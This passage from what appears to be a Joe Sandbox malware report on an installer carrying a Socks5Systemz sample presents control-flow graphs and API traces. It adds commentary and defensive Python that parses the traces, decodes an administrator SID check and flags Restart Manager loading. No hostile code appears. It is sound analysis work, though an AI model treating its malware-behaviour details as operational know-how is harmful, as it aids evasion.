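        raise ValueError("not a control_flow_graph dump")
    blocks, edges, cur, i = {}, [], None, 1
    while i < len(tokens):
        tok = tokens[i]
        if "->" in tok:                      # edge between two block ids
            src, dst = tok.split("->")
            edges.append((int(src), int(dst)))
        elif tok == "*":                     # repeat count for the previous label
            blocks[cur].labels[-1] += " * " + tokens[i + 1]
            i += 1
        elif tok == "call":                  # internal call to a sub-function
            blocks[cur].labels.append("call " + tokens[i + 1])
            i += 1
        elif tok.isdigit() and i + 1 < len(tokens) and RANGE_RE.match(tokens[i + 1]):
            cur = int(tok)                   # new block: id followed by start-end
            start, end = tokens[i + 1].split("-")
            blocks[cur] = Block(cur, int(start, 16), int(end, 16))
            i += 1
        else:                                # anything else is an API name
            blocks[cur].labels.append(tok)
        i += 1
    return blocks, edges


def entry_blocks(blocks, edges):
    """Blocks with no incoming edge; a single function has exactly one."""
    targets = {dst for _, dst in edges}
    return [n for n in blocks if n not in targets]


def path_to_api(blocks, edges, entry, api):
    """Shortest block path (BFS) from entry to a block that calls `api`, or None."""
    succ = {}
    for src, dst in edges:
        succ.setdefault(src, []).append(dst)
    targets = {b.node_id for b in blocks.values() if api in b.apis}
    queue, seen = deque([[entry]]), {entry}
    while queue:
        path = queue.popleft()
        if path[-1] in targets:
            return path
        for nxt in succ.get(path[-1], []):
            if nxt not in seen:
                seen.add(nxt)
                queue.append(path + [nxt])
    return None


def apis_along(blocks, path):
    """The API calls a walk down `path` passes through, in order."""
    return [api for node in path for api in blocks[node].apis]


if __name__ == "__main__":
    blocks, edges = parse_cfg(CFG_DUMP)
    entry = entry_blocks(blocks, edges)[0]
    for api in ("CheckTokenMembership", "EqualSid"):
        path = path_to_api(blocks, edges, entry, api)
        print(api, "reached via blocks", path)
        print("  APIs on the way:", apis_along(blocks, path))
```

The two printed paths are the security-relevant reading of this graph: the short path (1578, 1579, 1582, 1584, 1586) is the modern CheckTokenMembership test, the long one through 1585, 1589, 1591 and 1611 is the manual token-groups comparison the code uses when GetProcAddress fails to find CheckTokenMembership.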

                                                                                        Control-flow Graph

                                                                                        control_flow_graph 1642 4502c0-4502cd 1643 4502d3-4502e0 GetVersion 1642->1643 1644 45037c-450386 1642->1644 1643->1644 1645 4502e6-4502fc LoadLibraryA 1643->1645 1645->1644 1646 4502fe-450377 GetProcAddress * 6 1645->1646 1646->1644
                                                                                        APIs
                                                                                        • GetVersion.KERNEL32(00480B52), ref: 004502D3
                                                                                        • LoadLibraryA.KERNEL32(Rstrtmgr.dll,00480B52), ref: 004502EB
                                                                                        • GetProcAddress.KERNEL32(6E4D0000,RmStartSession), ref: 00450309
                                                                                        • GetProcAddress.KERNEL32(6E4D0000,RmRegisterResources), ref: 0045031E
                                                                                        • GetProcAddress.KERNEL32(6E4D0000,RmGetList), ref: 00450333
                                                                                        • GetProcAddress.KERNEL32(6E4D0000,RmShutdown), ref: 00450348
                                                                                        • GetProcAddress.KERNEL32(6E4D0000,RmRestart), ref: 0045035D
                                                                                        • GetProcAddress.KERNEL32(6E4D0000,RmEndSession), ref: 00450372
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$LibraryLoadVersion
                                                                                        • String ID: RmEndSession$RmGetList$RmRegisterResources$RmRestart$RmShutdown$RmStartSession$Rstrtmgr.dll
                                                                                        • API String ID: 1968650500-3419246398
                                                                                        • Opcode ID: 2681632e5309952c30eea3f8c2bf2722b4339596373eceda0d07b93e3cd0d7e4
                                                                                        • Instruction ID: c77cef2ad5653e61b65a4477cbb73d0d56cf7b8a9d174f96be3e9b6947252677
                                                                                        • Opcode Fuzzy Hash: 2681632e5309952c30eea3f8c2bf2722b4339596373eceda0d07b93e3cd0d7e4
                                                                                        • Instruction Fuzzy Hash: B211F7B4510301DBD710FB61BF45A2E36E9E728315B08063FE804961A2CB7C4844CF8C
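The two API lists above (the membership check at 0042E09C and the loader at 004502C0) say more once decoded. The SID built at 0042E0D6 has two sub-authorities, 0x20 and 0x220; if the identifier authority behind the pointer 00499788 is SECURITY_NT_AUTHORITY, which the trace cannot show, that SID is S-1-5-32-544, BUILTIN\Administrators, and the routine answers "is the caller an administrator". The 004502C0 routine checks GetVersion, loads Rstrtmgr.dll and resolves RmStartSession through RmEndSession by name, so the Restart Manager (used by installers to find and stop processes that hold files about to be replaced) never appears in the import table. Both are ordinary installer behaviour: the file-copy log strings listed earlier, the STOPIMAGE bitmap and the system-menu entry match Inno Setup's, so for triage these routines most likely belong to the installer stub rather than to the Socks5Systemz payload it carries. One caveat when reading these lines: the argument columns are raw stack slots captured at the call, so trailing values are often stale from an earlier frame (the GetVersion line repeats AllocateAndInitializeSid's arguments, and the GetProcAddress at 0042E112 shows advapi32.dll where the symbol name sits). The Python below is an added example, not code from the report or from the sample; it parses the API lines, decodes the SID under the stated authority assumption, groups GetProcAddress resolutions under the library loaded just before them, and marks a resolution whose name slot is not a symbol as unknown rather than guessing.

```python
import re
from dataclasses import dataclass

# Constructed input: the "APIs" lines of the two report blocks above, copied verbatim
# (admin-membership check at 0042E09C, Restart Manager loader at 004502C0).
SAMPLE_TRACE = """\
• AllocateAndInitializeSid.ADVAPI32(00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E0D6
• GetVersion.KERNEL32(00000000,0042E280,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E0F3
• GetModuleHandleA.KERNEL32(advapi32.dll,CheckTokenMembership,00000000,0042E280,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E10C
• GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042E112
• CheckTokenMembership.KERNELBASE(00000000,00000000,?,00000000,0042E280,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E127
• FreeSid.ADVAPI32(00000000,0042E287,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E27A
• GetVersion.KERNEL32(00480B52), ref: 004502D3
• LoadLibraryA.KERNEL32(Rstrtmgr.dll,00480B52), ref: 004502EB
• GetProcAddress.KERNEL32(6E4D0000,RmStartSession), ref: 00450309
• GetProcAddress.KERNEL32(6E4D0000,RmRegisterResources), ref: 0045031E
• GetProcAddress.KERNEL32(6E4D0000,RmGetList), ref: 00450333
• GetProcAddress.KERNEL32(6E4D0000,RmShutdown), ref: 00450348
• GetProcAddress.KERNEL32(6E4D0000,RmRestart), ref: 0045035D
• GetProcAddress.KERNEL32(6E4D0000,RmEndSession), ref: 00450372
"""

# "• Name.MODULE(arg,arg,...), ref: ADDRESS" as the report prints it
LINE_RE = re.compile(
    r"^\s*•?\s*(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
SYMBOL_RE = re.compile(r"^[A-Za-z_]\w*$")
HEX_RE = re.compile(r"^[0-9A-Fa-f]{8}$")
LOADERS = {"LoadLibraryA", "LoadLibraryW", "GetModuleHandleA", "GetModuleHandleW"}
# Sub-authority tuples this example knows how to name (assumes NT authority 5).
WELL_KNOWN = {(32, 544): "BUILTIN\\Administrators"}


@dataclass
class ApiCall:
    api: str
    module: str
    args: list
    ref: int


def parse_trace(text):
    """Parse report API lines; arguments are kept as the raw strings the report shows."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append(ApiCall(m.group("api"), m.group("module"), args, int(m.group("ref"), 16)))
    return calls


def decode_sid(call, identifier_authority=5):
    """AllocateAndInitializeSid(pIdentifierAuthority, nSubAuthorityCount, sub0..sub7, ...).

    Only a pointer to the identifier authority is visible in the trace, so the
    caller supplies it; the default 5 (SECURITY_NT_AUTHORITY) is an assumption.
    """
    if call.api != "AllocateAndInitializeSid":
        raise ValueError("not an AllocateAndInitializeSid call")
    count = int(call.args[1], 16)
    subs = tuple(int(a, 16) for a in call.args[2:2 + count])
    sid = "S-1-%d-%s" % (identifier_authority, "-".join(str(s) for s in subs))
    return sid, WELL_KNOWN.get(subs)


def looks_like_symbol(tok):
    """A plausible export name: identifier-shaped, not an 8-digit hex value."""
    return bool(SYMBOL_RE.match(tok)) and not HEX_RE.match(tok)


def resolved_imports(calls):
    """Group GetProcAddress names under the library loaded most recently before them.

    A name slot that is not a symbol (stale stack, as at 0042E112) is recorded as "?".
    """
    imports, current = {}, None
    for c in calls:
        if c.api in LOADERS and c.args:
            current = c.args[0]
            imports.setdefault(current, [])
        elif c.api == "GetProcAddress" and current is not None:
            name = c.args[1] if len(c.args) > 1 else ""
            imports[current].append(name if looks_like_symbol(name) else "?")
    return imports


def triage(calls):
    """Flag the two patterns these blocks show: a group-membership test on a
    decoded SID, and Restart Manager resolved by name at runtime."""
    findings = []
    apis = {c.api for c in calls}
    for c in calls:
        if c.api == "AllocateAndInitializeSid" and ({"CheckTokenMembership", "EqualSid"} & apis):
            sid, name = decode_sid(c)
            findings.append("membership check against %s (%s) at %08X" % (sid, name or "unknown", c.ref))
    for lib, names in resolved_imports(calls).items():
        if lib.lower() == "rstrtmgr.dll":
            findings.append("Restart Manager loaded at runtime; resolved " + ", ".join(names))
    return findings


if __name__ == "__main__":
    for finding in triage(parse_trace(SAMPLE_TRACE)):
        print(finding)
```

The same parser applies to any "APIs" block in a Joe Sandbox report; the authority assumption in decode_sid is the one place where the trace alone is not enough, and a static look at the bytes at 00499788 in the dumped image would settle it.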

                                                                                        Control-flow Graph

                                                                                        control_flow_graph 1790 423c0c-423c40 1791 423c42-423c43 1790->1791 1792 423c74-423c8b call 423b68 1790->1792 1794 423c45-423c61 call 40b24c 1791->1794 1797 423cec-423cf1 1792->1797 1798 423c8d 1792->1798 1827 423c63-423c6b 1794->1827 1828 423c70-423c72 1794->1828 1800 423cf3 1797->1800 1801 423d27-423d2c 1797->1801 1802 423c93-423c96 1798->1802 1803 423d50-423d60 1798->1803 1804 423fb1-423fb9 1800->1804 1805 423cf9-423d01 1800->1805 1808 423d32-423d35 1801->1808 1809 42409a-4240a8 IsIconic 1801->1809 1806 423cc5-423cc8 1802->1806 1807 423c98 1802->1807 1810 423d62-423d67 1803->1810 1811 423d6b-423d73 call 424194 1803->1811 1816 424152-42415a 1804->1816 1822 423fbf-423fca call 4181e0 1804->1822 1814 423f13-423f3a SendMessageA 1805->1814 1815 423d07-423d0c 1805->1815 1823 423da9-423db0 1806->1823 1824 423cce-423ccf 1806->1824 1818 423df6-423e06 call 423b84 1807->1818 1819 423c9e-423ca1 1807->1819 1820 4240d6-4240eb call 424850 1808->1820 1821 423d3b-423d3c 1808->1821 1809->1816 1817 4240ae-4240b9 GetFocus 1809->1817 1825 423d78-423d80 call 4241dc 1810->1825 1826 423d69-423d8c call 423b84 1810->1826 1811->1816 1814->1816 1829 423d12-423d13 1815->1829 1830 42404a-424055 1815->1830 1831 424171-424177 1816->1831 1817->1816 1838 4240bf-4240c8 call 41eff4 1817->1838 1818->1816 1839 423ca7-423caa 1819->1839 1840 423e1e-423e3a PostMessageA call 423b84 1819->1840 1820->1816 1833 423d42-423d45 1821->1833 1834 4240ed-4240f4 1821->1834 1822->1816 1866 423fd0-423fdf call 4181e0 IsWindowEnabled 1822->1866 1823->1816 1843 423db6-423dbd 1823->1843 1844 423cd5-423cd8 1824->1844 1845 423f3f-423f46 1824->1845 1825->1816 1826->1816 1827->1831 1828->1792 1828->1794 1846 424072-42407d 1829->1846 1847 423d19-423d1c 1829->1847 1830->1816 1849 42405b-42406d 1830->1849 1850 424120-424127 1833->1850 1851 423d4b 1833->1851 1860 4240f6-424109 call 4244d4 1834->1860 1861 42410b-42411e call 42452c 1834->1861 1838->1816 1898 4240ce-4240d4 SetFocus 1838->1898 1857 423cb0-423cb3 1839->1857 1858 423ea5-423eac 1839->1858 1840->1816 1843->1816 1863 423dc3-423dc9 1843->1863 1864 423cde-423ce1 1844->1864 1865 423e3f-423e5f call 423b84 1844->1865 1845->1816 1853 423f4c-423f51 call 404e54 1845->1853 1846->1816 1875 424083-424095 1846->1875 1872 423d22 1847->1872 1873 423f56-423f5e 1847->1873 1849->1816 1870 42413a-424149 1850->1870 1871 424129-424138 1850->1871 1874 42414b-42414c call 423b84 1851->1874 1853->1816 1881 423cb9-423cba 1857->1881 1882 423dce-423ddc IsIconic 1857->1882 1883 423eae-423ec1 call 423b14 1858->1883 1884 423edf-423ef0 call 423b84 1858->1884 1860->1816 1861->1816 1863->1816 1867 423ce7 1864->1867 1868 423e0b-423e19 call 424178 1864->1868 1911 423e83-423ea0 call 423a84 PostMessageA 1865->1911 1912 423e61-423e7e call 423b14 PostMessageA 1865->1912 1866->1816 1915 423fe5-423ff4 call 4181e0 IsWindowVisible 1866->1915 1867->1874 1868->1816 1870->1816 1871->1816 1872->1874 1873->1816 1896 423f64-423f6b 1873->1896 1907 424151 1874->1907 1875->1816 1899 423cc0 1881->1899 1900 423d91-423d99 1881->1900 1889 423dea-423df1 call 423b84 1882->1889 1890 423dde-423de5 call 423bc0 1882->1890 1924 423ed3-423eda call 423b84 1883->1924 1925 423ec3-423ecd call 41ef58 1883->1925 1918 423ef2-423ef8 call 41eea4 1884->1918 1919 423f06-423f0e call 423a84 1884->1919 1889->1816 1890->1816 1896->1816 1910 423f71-423f80 call 4181e0 IsWindowEnabled 1896->1910 1898->1816 1899->1874 1900->1816 1913 423d9f-423da4 call 422c4c 1900->1913 1907->1816 1910->1816 1940 423f86-423f9c call 412310 1910->1940 1911->1816 1912->1816 1913->1816 1915->1816 1941 423ffa-424045 GetFocus call 4181e0 SetFocus call 415240 SetFocus 1915->1941 1938 423efd-423f00 1918->1938 1919->1816 1924->1816 1925->1924 1938->1919 1940->1816 1946 423fa2-423fac 1940->1946 1941->1816 1946->1816
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 22958418fcb5307417e2cb8c5b21c835fdc4d5c2778e3f26f52eb9817f6a2da5
                                                                                        • Instruction ID: afb4f91cf4018cf9acc1c9974f14325182323c15c0e0405bd0f9b005e596376e
                                                                                        • Opcode Fuzzy Hash: 22958418fcb5307417e2cb8c5b21c835fdc4d5c2778e3f26f52eb9817f6a2da5
                                                                                        • Instruction Fuzzy Hash: 03E1AE31700124EFDB04DF69E989AADB7B5FB54300FA440AAE5559B352C73CEE81DB09

                                                                                        Control-flow Graph

                                                                                        control_flow_graph 2133 4673a4-4673ba 2134 4673c4-46747b call 49577c call 402b30 * 6 2133->2134 2135 4673bc-4673bf call 402d30 2133->2135 2152 46747d-4674a4 call 41463c 2134->2152 2153 4674b8-4674d1 2134->2153 2135->2134 2157 4674a6 2152->2157 2158 4674a9-4674b3 call 4145fc 2152->2158 2159 4674d3-4674fa call 41461c 2153->2159 2160 46750e-46751c call 495a84 2153->2160 2157->2158 2158->2153 2166 4674ff-467509 call 4145dc 2159->2166 2167 4674fc 2159->2167 2168 46751e-46752d call 4958cc 2160->2168 2169 46752f-467531 call 4959f0 2160->2169 2166->2160 2167->2166 2174 467536-467589 call 4953e0 call 41a3d0 * 2 2168->2174 2169->2174 2181 46759a-4675af call 451458 call 414b18 2174->2181 2182 46758b-467598 call 414b18 2174->2182 2188 4675b4-4675bb 2181->2188 2182->2188 2189 467603-467a89 call 49581c call 495b40 call 41461c * 3 call 4146bc call 4145dc * 3 call 460bfc call 460c14 call 460c20 call 460c68 call 460bfc call 460c14 call 460c20 call 460c68 call 460c14 call 460c68 LoadBitmapA call 41d6b0 call 460c38 call 460c50 call 467180 call 468c94 call 466800 call 40357c call 414b18 call 466b38 call 466b40 call 466800 call 40357c * 2 call 414b18 call 468c94 call 466800 call 414b18 call 466b38 call 466b40 call 414b18 * 2 call 468c94 call 414b18 * 2 call 466b38 call 4145fc call 466b38 call 4145fc call 468c94 call 414b18 call 466b38 call 466b40 call 468c94 call 414b18 call 466b38 call 4145fc * 2 call 414b18 call 466b38 call 4145fc 2188->2189 2190 4675bd-4675fe call 4146bc call 414700 call 420f98 call 420fc4 call 420b68 call 420b94 2188->2190 2320 467ae5-467afe call 414a44 * 2 2189->2320 2321 467a8b-467ae3 call 4145fc call 414b18 call 466b38 call 4145fc 2189->2321 2190->2189 2328 467b03-467bb4 call 466800 call 468c94 call 466800 call 414b18 call 495b40 call 466b38 2320->2328 2321->2328 2347 467bb6-467bd1 2328->2347 2348 467bee-467e24 call 466800 call 414b18 call 495b50 * 2 call 42e8c0 call 4145fc call 466b38 call 4145fc call 4181e0 call 42ed38 call 414b18 call 49581c call 495b40 call 41461c call 466800 call 414b18 call 466b38 call 4145fc call 466800 call 468c94 call 466800 call 414b18 call 466b38 call 4145fc call 466b40 call 466800 call 414b18 call 466b38 2328->2348 2349 467bd6-467be9 call 4145fc 2347->2349 2350 467bd3 2347->2350 2409 467e26-467e2f 2348->2409 2410 467e65-467f1e call 466800 call 468c94 call 466800 call 414b18 call 495b40 call 466b38 2348->2410 2349->2348 2350->2349 2409->2410 2411 467e31-467e60 call 414a44 call 466b40 2409->2411 2428 467f20-467f3b 2410->2428 2429 467f58-468379 call 466800 call 414b18 call 495b50 * 2 call 42e8c0 call 4145fc call 466b38 call 4145fc call 414b18 call 49581c call 495b40 call 41461c call 414b18 call 466800 call 468c94 call 466800 call 414b18 call 466b38 call 466b40 call 42bbd0 call 495b50 call 44e8b0 call 466800 call 468c94 call 466800 call 468c94 call 466800 call 468c94 * 2 call 414b18 call 466b38 call 466b40 call 468c94 call 4953e0 call 41a3d0 call 466800 call 40357c call 414b18 call 466b38 call 4145fc call 414b18 * 2 call 495b50 call 403494 call 40357c * 2 call 414b18 2410->2429 2411->2410 2430 467f40-467f53 call 4145fc 2428->2430 2431 467f3d 2428->2431 2528 46839d-4683a4 2429->2528 2529 46837b-468398 call 44ffdc call 450138 2429->2529 2430->2429 2431->2430 2531 4683a6-4683c3 call 44ffdc call 450138 2528->2531 2532 4683c8-4683cf 2528->2532 2529->2528 2531->2532 2534 4683f3-468439 call 4181e0 GetSystemMenu AppendMenuA call 403738 AppendMenuA call 468d88 2532->2534 2535 4683d1-4683ee call 44ffdc call 450138 2532->2535 2549 468453 2534->2549 2550 46843b-468442 2534->2550 2535->2534 2553 468455-468464 2549->2553 2551 468444-46844d 2550->2551 2552 46844f-468451 2550->2552 2551->2549 2551->2552 2552->2553 2554 468466-46846d 2553->2554 2555 46847e 2553->2555 2556 46846f-468478 2554->2556 2557 46847a-46847c 2554->2557 2558 468480-46849a 2555->2558 2556->2555 2556->2557 2557->2558 2559 468543-46854a 2558->2559 2560 4684a0-4684a9 2558->2560 2563 468550-468573 call 47c26c call 403450 2559->2563 2564 4685dd-4685eb call 414b18 2559->2564 2561 468504-46853e call 414b18 * 3 2560->2561 2562 4684ab-468502 call 47c26c call 414b18 call 47c26c call 414b18 call 47c26c call 414b18 2560->2562 2561->2559 2562->2559 2583 468584-468598 call 403494 2563->2583 2584 468575-468582 call 47c440 2563->2584 2570 4685f0-4685f9 2564->2570 2574 4685ff-468617 call 429fd8 2570->2574 2575 468709-468738 call 42b96c call 44e83c 2570->2575 2592 46868e-468692 2574->2592 2593 468619-46861d 2574->2593 2609 4687e6-4687ea 2575->2609 2610 46873e-468742 2575->2610 2605 4685aa-4685db call 42c804 call 42cbc0 call 403494 call 414b18 2583->2605 2606 46859a-4685a5 call 403494 2583->2606 2584->2605 2598 468694-46869d 2592->2598 2599 4686e2-4686e6 2592->2599 2600 46861f-468659 call 40b24c call 47c26c 2593->2600 2598->2599 2607 46869f-4686aa 2598->2607 2603 4686fa-468704 call 42a05c 2599->2603 2604 4686e8-4686f8 call 42a05c 2599->2604 2660 46865b-468662 2600->2660 2661 468688-46868c 2600->2661 2603->2575 2604->2575 2605->2570 2606->2605 2607->2599 2619 4686ac-4686b0 2607->2619 2612 4687ec-4687f3 2609->2612 2613 468869-46886d 2609->2613 2611 468744-468756 call 40b24c 2610->2611 2639 468788-4687bf call 47c26c call 44cb0c 2611->2639 2640 468758-468786 call 47c26c call 44cbdc 2611->2640 2612->2613 2622 4687f5-4687fc 2612->2622 2623 4688d6-4688df 2613->2623 2624 46886f-468886 call 40b24c 2613->2624 2628 4686b2-4686d5 call 40b24c call 406ac4 2619->2628 2622->2613 2633 4687fe-468809 2622->2633 2631 4688e1-4688f9 call 40b24c call 4699fc 2623->2631 2632 4688fe-468913 call 466ee0 call 466c5c 2623->2632 2654 4688c6-4688d4 call 4699fc 2624->2654 2655 468888-4688c4 call 40b24c call 4699fc * 2 call 46989c 2624->2655 2671 4686d7-4686da 2628->2671 2672 4686dc-4686e0 2628->2672 2631->2632 2685 468965-46896f call 414a44 2632->2685 2686 468915-468938 call 42a040 call 40b24c 2632->2686 2633->2632 2642 46880f-468813 2633->2642 2687 4687c4-4687c8 2639->2687 2640->2687 2653 468815-46882b call 40b24c 2642->2653 2682 46885e-468862 2653->2682 2683 46882d-468859 call 42a05c call 4699fc call 46989c 2653->2683 2654->2632 2655->2632 2660->2661 2673 468664-468676 call 406ac4 2660->2673 2661->2592 2661->2600 2671->2599 2672->2599 2672->2628 2673->2661 2696 468678-468682 2673->2696 2682->2653 2688 468864 2682->2688 2683->2632 2697 468974-468993 call 414a44 2685->2697 2711 468943-468952 call 414a44 2686->2711 2712 46893a-468941 2686->2712 2694 4687d3-4687d5 2687->2694 2695 4687ca-4687d1 2687->2695 2688->2632 2701 4687dc-4687e0 2694->2701 2695->2694 2695->2701 2696->2661 2702 468684 2696->2702 2713 468995-4689b8 call 42a040 call 469b5c 2697->2713 2714 4689bd-4689e0 call 47c26c call 403450 2697->2714 2701->2609 2701->2611 2702->2661 2711->2697 2712->2711 2717 468954-468963 call 414a44 2712->2717 2713->2714 2730 4689e2-4689eb 2714->2730 2731 4689fc-468a05 2714->2731 2717->2697 2730->2731 2732 4689ed-4689fa call 47c440 2730->2732 2733 468a07-468a19 call 403684 2731->2733 2734 468a1b-468a2b call 403494 2731->2734 2741 468a3d-468a54 call 414b18 2732->2741 2733->2734 2742 468a2d-468a38 call 403494 2733->2742 2734->2741 2746 468a56-468a5d 2741->2746 2747 468a8a-468a94 call 414a44 2741->2747 2742->2741 2748 468a5f-468a68 2746->2748 2749 468a6a-468a74 call 42b0e4 2746->2749 2753 468a99-468abe call 403400 * 3 2747->2753 2748->2749 2751 468a79-468a88 call 414a44 2748->2751 2749->2751 2751->2753
                                                                                        APIs
                                                                                          • Part of subcall function 004958CC: GetWindowRect.USER32(00000000), ref: 004958E2
                                                                                        • LoadBitmapA.USER32(00400000,STOPIMAGE), ref: 00467773
                                                                                          • Part of subcall function 0041D6B0: GetObjectA.GDI32(?,00000018,0046778D), ref: 0041D6DB
                                                                                          • Part of subcall function 00467180: SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 00467223
                                                                                          • Part of subcall function 00467180: ExtractIconA.SHELL32(00400000,00000000,?), ref: 00467249
                                                                                          • Part of subcall function 00467180: ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 004672A0
                                                                                          • Part of subcall function 00466B40: KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00467828,00000000,00000000,00000000,0000000C,00000000), ref: 00466B58
                                                                                          • Part of subcall function 00495B50: MulDiv.KERNEL32(0000000D,?,0000000D), ref: 00495B5A
                                                                                          • Part of subcall function 0042ED38: GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EDA8
                                                                                          • Part of subcall function 0042ED38: SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042EDC5
                                                                                          • Part of subcall function 0049581C: GetDC.USER32(00000000), ref: 0049583E
                                                                                          • Part of subcall function 0049581C: SelectObject.GDI32(?,00000000), ref: 00495864
                                                                                          • Part of subcall function 0049581C: ReleaseDC.USER32(00000000,?), ref: 004958B5
                                                                                          • Part of subcall function 00495B40: MulDiv.KERNEL32(0000004B,?,00000006), ref: 00495B4A
                                                                                        • GetSystemMenu.USER32(00000000,00000000,0000000C,00000000,00000000,00000000,00000000,021BFBEC,021C194C,?,?,021C197C,?,?,021C19CC,?), ref: 004683FD
                                                                                        • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 0046840E
                                                                                        • AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 00468426
                                                                                          • Part of subcall function 0042A05C: SendMessageA.USER32(00000000,0000014E,00000000,00000000), ref: 0042A072
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Menu$AppendExtractIconObject$AddressAutoBitmapCallbackCompleteDispatcherFileInfoLoadMessageProcRectReleaseSelectSendSystemUserWindow
                                                                                        • String ID: $(Default)$STOPIMAGE$%H
                                                                                        • API String ID: 3231140908-2624782221
                                                                                        • Opcode ID: cd61aa661d0cbe35304877807cea77ca0702e96d718fc27b010991c92e86a780
                                                                                        • Instruction ID: 1a3196d4b4984e68f3522cc8585b165e0004af585c118fa25862355e2bbb38c0
                                                                                        • Opcode Fuzzy Hash: cd61aa661d0cbe35304877807cea77ca0702e96d718fc27b010991c92e86a780
                                                                                        • Instruction Fuzzy Hash: 95F2C6346005248FCB00EF69D9D9F9973F1BF49304F1582BAE5049B36ADB74AC46CB9A
                                                                                        APIs
                                                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,004750F2,?,?,0049C1E0,00000000), ref: 00474FE1
                                                                                        • FindNextFileA.KERNEL32(00000000,?,00000000,?,00000000,004750F2,?,?,0049C1E0,00000000), ref: 004750BE
                                                                                        • FindClose.KERNEL32(00000000,00000000,?,00000000,?,00000000,004750F2,?,?,0049C1E0,00000000), ref: 004750CC
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Find$File$CloseFirstNext
                                                                                        • String ID: unins$unins???.*
                                                                                        • API String ID: 3541575487-1009660736
                                                                                        • Opcode ID: 490a2bf6f62b777b12f8bb075fd261ec892e44da2a65e6c72c5e66397d3a6b60
                                                                                        • Instruction ID: 191fa049ef1442540897bd6b232d6b1da598bf4afdbbee48782243349675ce5a
                                                                                        • Opcode Fuzzy Hash: 490a2bf6f62b777b12f8bb075fd261ec892e44da2a65e6c72c5e66397d3a6b60
                                                                                        • Instruction Fuzzy Hash: 95315074A00548ABCB10EB65CD81BDEB7A9DF45304F50C0B6E40CAB3A2DB789F418B59
                                                                                        APIs
                                                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,00452AC3,?,?,-00000001,00000000), ref: 00452A9D
